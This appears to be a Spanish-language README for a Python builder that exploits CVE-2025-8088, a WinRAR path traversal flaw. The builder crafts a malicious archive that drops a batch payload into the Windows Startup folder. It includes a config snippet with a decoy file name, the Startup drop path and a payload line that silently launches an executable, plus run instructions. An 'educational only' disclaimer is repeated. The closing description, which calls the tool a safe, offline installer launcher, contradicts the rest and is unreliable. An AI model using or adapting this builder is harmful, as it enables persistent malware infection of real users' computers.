
CVE-2025-8088-BUILDER
⚠ Esta herramienta se crea únicamente con fines educativos. El uso no autorizado fuera de entornos controlados está estrictamente prohibido.
Un script de Python que explota CVE-2025-8088, una vulnerabilidad de path traversal en WinRAR, generando un archivo malicioso que coloca payloads ejecutables en la carpeta de inicio de Windows usando múltiples niveles de directorios relativos para garantizar una ejecución fiable independientemente de la ubicación de extracción.
Configure el archivo config.py
# Configuration
DECOY_FILE_NAME = "document"
DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B C:\Users\Public\file.exe\n"
Para usar su propio archivo señuelo, escriba su ruta completa en lugar del nombre.
Ejecute el script:
python CVE-2025-8088.py
La salida aparecerá en la carpeta output.
Esta herramienta se crea únicamente con fines educativos. El uso no autorizado fuera de entornos controlados está estrictamente prohibido.
Autor: Desert Scripts
Descripción:
Un lanzador local sin conexión que ejecuta MyAppInstaller.exe.
Sin actividad de red. Seguro y transparente.